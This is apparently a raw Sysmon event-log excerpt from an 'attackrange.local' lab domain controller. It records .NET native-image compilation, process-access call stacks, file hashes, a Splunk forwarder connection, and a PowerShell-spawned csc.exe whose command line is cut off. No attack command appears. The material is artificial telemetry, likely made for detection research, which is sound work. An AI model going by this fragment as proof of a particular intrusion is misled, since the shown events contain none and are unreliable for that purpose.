21:07:15.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-CB05-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-A283-60D3-CA05-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WO37GBXPBI\System.Deployment.ni.dll.auxMD5=B1300A7345D1AE92B9FBD8A1DD463080,SHA256=BB88439B6EF981E5A0150EF49EADF03D8CEB83782DBCF17B52D1BD7BC73A68A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.686{4DB9351A-A283-60D3-CA05-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WO37GBXPBI\System.Deployment.ni.dllMD5=20DF76A1DF1036D461AE061D629B5607,SHA256=2835B56124E58AFD09D1D48749153CD76993CC28CEE86246A4C6A703FEA37925,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=967C186DF7BE8E139B68893044E5286E,SHA256=99FC2417505100A62F26FE095F250DD9B74F168A9B0CF731CB6DA950A8C67A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-A283-60D3-C905-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUFI8VEIJD\System.Data.SqlXml.ni.dll.auxMD5=F0874675F72593F9956DB47F31F19DBE,SHA256=29ED670438B542D3CE6370602A0E2B44EE075695C37889282D8011ADD511FEAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-A283-60D3-C905-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUFI8VEIJD\System.Data.SqlXml.ni.dllMD5=75AAEC3E04782FB17E8DD9BDBDC59175,SHA256=B7A69537F7E4A39B575FCF73621B1AA5673F28FB3313F4BB6F818464FEA34868,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3265E52F7C02E84CF7A9A1FD91D5877,SHA256=6A856C0A9F61F4982E02820585665A571F886DF7BA5B6E2B14921AE21A92E9DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-A282-60D3-C805-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCUQPUVQ00\System.Xml.ni.dll.auxMD5=E0D8C205AE8E4134695C6382D1687882,SHA256=9EE87305F6C9248CDE018A8B851FF1DD0411AF561B434DA7702D3603964ED01D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-A282-60D3-C805-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCUQPUVQ00\System.Xml.ni.dllMD5=0806CABD7295931429C11278BCE28FCE,SHA256=5BFE97B592ED699B92F550258652FAE2E604E8881D36F97DC2131BB6553FF794,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000023545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.209{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61462-false10.0.1.12-8000- 10341000x800000000000000023653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.967{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A284-60D3-D305-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRHZWXUQ4X\System.IdentityModel.Selectors.ni.dll.auxMD5=0268166FC40A38E6CC2DA46CE1D59E9E,SHA256=FA0420BF65C318DB22278C32316710585C444BB8472A7A7DB0F1303C3CC9E950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A284-60D3-D305-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRHZWXUQ4X\System.IdentityModel.Selectors.ni.dllMD5=9D85263F4D48ABA9B33EAD2C83D255B5,SHA256=E36D92E5BDB03D9A747876B9783A7901AC47C635FEC912819A47B3547A2D6518,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d8e81|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d828a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bed14bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64) 154100x800000000000000023641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.925{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 